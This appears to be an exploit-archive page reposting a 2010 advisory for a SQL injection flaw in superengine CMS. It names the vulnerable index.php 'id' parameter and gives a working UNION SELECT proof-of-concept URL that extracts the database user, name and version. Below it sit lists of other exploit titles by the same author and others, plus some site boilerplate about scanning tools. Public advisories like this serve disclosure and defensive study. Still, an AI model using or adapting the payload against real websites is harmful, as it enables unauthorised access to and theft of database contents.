Menu

Search for hundreds of thousands of exploits

"superengine CMS (Custom Pack) - SQL Injection"

Author

Exploit author

10n1z3d

Platform

Exploit platform

php

Release date

Exploit published date

2010-02-15

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
_______  _|__|  | ____________   ____   ____  
_/ __ \  \/ /  |  | \___   /  _ \ /    \_/ __ \ 
\  ___/\   /|  |  |__/    (  <_> )   |  \  ___/ 
 \___  >\_/ |__|____/_____ \____/|___|  /\___  >
     \/                   \/          \/     \/ .org
    

Author: 10n1z3d <10n1z3d[at]w[dot]cn>    
Date: 15/02/2010
---------------------------------------------------------
superengine CMS (Custom Pack) SQL Injection Vulnerability
---------------------------------------------------------
Vendor: http://superengine.ro/
Vuln:
  http://[server]/index.php?mod=0&id=1[SQLI]

PoC:    
  http://[server]/index.php?mod=0&id=-1337+UNION+ALL+SELECT+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6
---------------------------------------------------------
Greetz to all evilzone.org members.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2010-08-26 "Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-08-15 "Zomplog 3.9 - 'message' Cross-Site Scripting" webapps php 10n1z3d
2010-08-15 "Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php 10n1z3d
2010-07-15 "eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-14 "ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-13 "Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-12 "Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-12 "Getsimple CMS 2.01 - Multiple Vulnerabilities" webapps php 10n1z3d
2010-07-12 "Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-12 "TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Mac's CMS 1.1.4 - 'SearchString' Cross-Site Scripting" webapps java 10n1z3d
2010-07-11 "TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php 10n1z3d
2010-07-10 "Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-10 "eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities" webapps php 10n1z3d
2010-02-15 "superengine CMS (Custom Pack) - SQL Injection" webapps php 10n1z3d
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.